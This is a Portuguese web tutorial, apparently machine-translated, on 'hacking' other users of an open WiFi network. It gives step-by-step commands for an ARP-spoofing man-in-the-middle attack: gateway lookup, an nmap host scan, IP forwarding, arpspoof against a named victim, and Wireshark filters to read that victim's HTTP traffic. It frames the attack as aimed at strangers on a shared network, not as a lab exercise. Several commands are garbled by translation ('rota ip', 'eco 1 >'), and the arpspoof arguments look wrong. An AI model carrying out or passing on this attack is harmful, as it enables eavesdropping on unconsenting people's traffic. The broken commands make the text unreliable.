SL- 307

Como hackear um WiFi aberto?

Bem, não parece muito legal hackear alguém que está usando o mesmo WiFi aberto que nós usamos? Se sim, então vamos verificar uma maneira de fazer isso acontecer.

Precisaremos das seguintes ferramentas:

  1. Kali Linux ou outro Linux com as ferramentas necessárias instaladas: Kali Linux é uma distribuição Linux de teste de penetração avançado usada para testes de penetração, hacking ético e avaliações de segurança de rede.
  2. Nmap: Nmap é um scanner de rede gratuito e de código aberto. É usado para descobrir hosts e serviços em uma rede, enviando pacotes e analisando as respostas.
  3. arpspoof: ARP significa protocolo de resolução de endereço . Sempre que conectamos nosso dispositivo à rede WiFi, o ARP nos atribui um endereço IP exclusivo e armazena o endereço MAC do dispositivo na tabela ARP e o arpspoof simplesmente falsifica essas solicitações.
  4. Wireshark: É um analisador de pacotes de código aberto usado para análise e solução de problemas de rede.

Passos para hackear um WiFi aberto

Passo 1: Conecte-se à rede de destino e execute o seguinte comando no terminal:

rota ip

Comando de rota IP

O comando acima é usado para encontrar o endereço do gateway por onde nosso tráfego está fluindo.

Passo 2: O próximo passo é usar o nmap para encontrar os diferentes hosts conectados à rede executando o seguinte comando:

nmap -sP -n "endereço do gateway/intervalo de IP"

Comando Nmap

Com este comando, encontraremos todos os hosts conectados à nossa rede alvo com seus endereços IP e também seus endereços MAC.

Etapa 3: Habilite o encaminhamento de IP usando o comando:

eco 1 > /proc/sys/net/ipv4/ip_forward

Passo 4: Para obter tráfego de vítimas em nosso dispositivo, usaremos o comando arpspoof. Para o comando arpspoof precisamos conhecer a interface na qual realizamos o ataque, para isso execute o seguinte comando:

ifconfig

comando ifconfig

Agora execute o seguinte comando:

arpspoof -i wlp3s0 -t "endereço IP do host da vítima" -r "nosso endereço IP"

Falsificamos o dispositivo da vítima de que o endereço do roteador foi alterado para o nosso endereço IP, agora podemos interceptar todo o tráfego.

Passo 5: Finalmente para interceptar o tráfego da vítima vamos usar o Wireshark e tudo o que precisamos fazer é usar o endereço IP da vítima. Digamos que queremos apenas tráfego HTTP, podemos usar a seguinte consulta:

http && ip.addr == "endereço IP da vítima"

Interceptando tráfego HTTP

Mostrar mais

Artigos relacionados

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Botão Voltar ao topo